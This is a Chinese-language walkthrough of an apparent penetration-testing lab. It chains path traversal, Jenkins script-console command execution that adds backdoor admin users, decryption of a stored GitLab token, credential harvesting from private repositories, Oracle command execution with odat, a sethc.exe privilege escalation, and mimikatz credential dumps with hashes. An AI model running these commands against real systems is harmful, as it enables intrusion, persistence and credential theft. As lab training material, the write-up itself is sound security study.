信息收集
先看扫描记录
没啥东西就俩web,联想提示,咱们去扫描下目录。
有一个源码,下载下来审计一下。
任意文件读取
先去读一下flag,然后再去读一下另一个网站的密码。
http://39.98.114.207/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
http://39.98.114.207/tools/content-log.php?logfile=C:ProgramDataJenkins.jenkinssecretsinitialAdminPassword
然后去登录下另一台网站的后台看看
jenkins后台RCE
jenkins有个地方可以执行命令
权限很高,那么添加个后门用户rdp上去看看
println "net user oceanz admin@123 /add".execute().text
println "net localgroup administrators oceanz /add".execute().text
内网渗透
先扫描下内网,顺便搭建个代理方便后续的渗透。
/ _ ___ ___ _ __ __ _ ___| | __
/ /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______ (__| | | (_| | (__| <
____/ |___/___|_| __,_|___|_|_
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.7:3306 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.11:445 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.31:139 open
172.22.14.46:139 open
172.22.14.11:139 open
172.22.14.31:135 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] NetBios 172.22.14.11 [+] DC:XIAORANGXR-DC
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetBios 172.22.14.46 XIAORANGXR-0923
[*] NetBios 172.22.14.31 WORKGROUPXR-ORACLE
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
看第二关的提示说有什么gitlab的apitoken 去翻翻配置文件看看
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="[email protected]">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="[email protected]">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
需要解密一下这个apitoken
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
然后利用api去列出gitlab中有哪些项目去翻翻oracle的密码
./proxychains4 -f proxychains.conf curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
记录
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "[email protected]:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "[email protected]:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "[email protected]:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "[email protected]:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [ ],
"topics": [ ],
"ssh_url_to_repo": "[email protected]:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [ ],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]
把这几个项目脱下来看看
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/awenode.git
有一堆用户名和密码
在xradmin仓库中找到了密码
url: 172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
找到一个工具odat针对oracle进行利用的,使用它来执行命令
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user ocean admin@123 /add'
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators ocean /add'
但是Arm架构的kali没有这个工具,先看其他的吧。
去下了一个在云服务器上打成功了。
上面的用户和密码看到有一列机器那一列和fscan扫描出来的记录有点像
XR-0923 | zhangshuai | wSbEajHzZs
先rdp过去看看。
可以看到这个用户是能够远程登录的。
SeRestorePrivilege提权
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
这怎么 winrm上来的权限还多一个,SeRestorePrivilege可以提权。
SeRestorePrivilege授予对系统上所有对象的写访问权,而不管它们的ACL如何。 滥用特权的三种方式:
-
修改服务二进制文件 -
覆盖系统进程使用的DLL -
修改注册表设置 也就是类似放大镜那种提权把cmd换成粘滞键然后锁屏按五次shift键 参考: https://forum.butian.net/share/348https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
可以看到提权成功。那么去抓一下hash
为了方便操作先添加个后门用户,抓到机器用户的hash
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 5971088 (00000000:005b1c90)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5970395 (00000000:005b19db)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :
Authentication Id : 0 ; 5969701 (00000000:005b1725)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-96-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
